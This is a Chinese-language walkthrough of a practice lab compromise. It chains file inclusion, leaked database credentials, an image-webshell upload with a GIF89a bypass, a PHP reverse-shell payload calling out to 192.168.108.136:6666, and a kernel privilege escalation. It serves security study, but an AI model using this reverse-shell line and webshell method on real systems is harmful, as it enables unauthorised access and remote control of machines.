信息收集
首先使用kali进行存活主机扫描
端口扫描
sudo nmap -sC -sV -p 1-10000 192.168.108.130
发现其开启了22端口 (ssh服务)、80端口(Apache)
使用dirb对其目录进行扫描
dirb http://192.168.108.130 /usr/share/dirb/wordlists/big.txt
漏洞探测
访问扫描出来的页面
先访问首页
构造万能密码
发现没有用
使用sqlmap
看来只能去访问其他目录进行尝试了
in.php
存在文件包含的漏洞
add.php
文件上传页面,但是好像不能被利用
show.php
head.php
test.php
提示file 参数无效,可能事文件包含漏洞,给他一个参数试一下
发现提示仍然错误,说明不是get传参,尝试post传参
看到文件直接可以下载下来
漏洞利用
之前目录扫描出来了一个c文件,直接访问是空白,把c.php作为参数传进去下载下来
应该是数据库的用户名和密码
ica_lab
访问/phpmy
使用c文件中的用户名和密码进行登录
成功进入了数据库管理页面
刚才使用的的数据库是ica_lab
,查看三个表
uname | pass |
---|---|
biLLu | hEx_it |
有了账号密码我们可以去登录首页
下载该页面
发现存在文件包含
下拉框选择showusers
选择adduser
该处可以上传图片文件
上传一个php文件,显示只能上传png和jpg
那只能上传图片马了
随便找一张图片,然后写一句话木马,命名为2.asp
进行上传
访问/uploaded_images,可以看到我们上传的文件
使用bp抓包
让他包含图片马试一下
发现包含图片马不成功,但是可以包含到/etc/passwd
发现是图片马的问题,使用1.png/b +1.php /1.png
的方法不行,使用GIF89a绕过的方法可以
包含成功
提权
开始反弹shell
load=/uploaded_images/2.jpg&continue=continue&cmd=php+-r+'$sock%3dfsockopen("192.168.108.136",6666)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'
反弹成功
查看内核版本
在kali下寻找相对应的漏洞
kali开始www服务,靶机下载源码
编译运行
提权成功
第二种思路
靶机还开启ssh服务,如果能利用文件下载或者文件包含得到主机的账户密码就可以直接shh登录了
直接使用dirbuster递归扫描目录
发现了config.inc.php是配置文件
使用文件下载
可以看到用户名和口令分别是root roottoor
我们可以直接ssh登录了
靶场小结
- 一个靶场可能存在多种渗透思路,不能局限于一种思路,该靶场就可以直接利用ssh。
- 对于图片木马的制作,可以尝试多种方法,可能一种方法不行,但另一种方法就可以。
- 要对一些目录或者文件敏感,及时发现配置文件。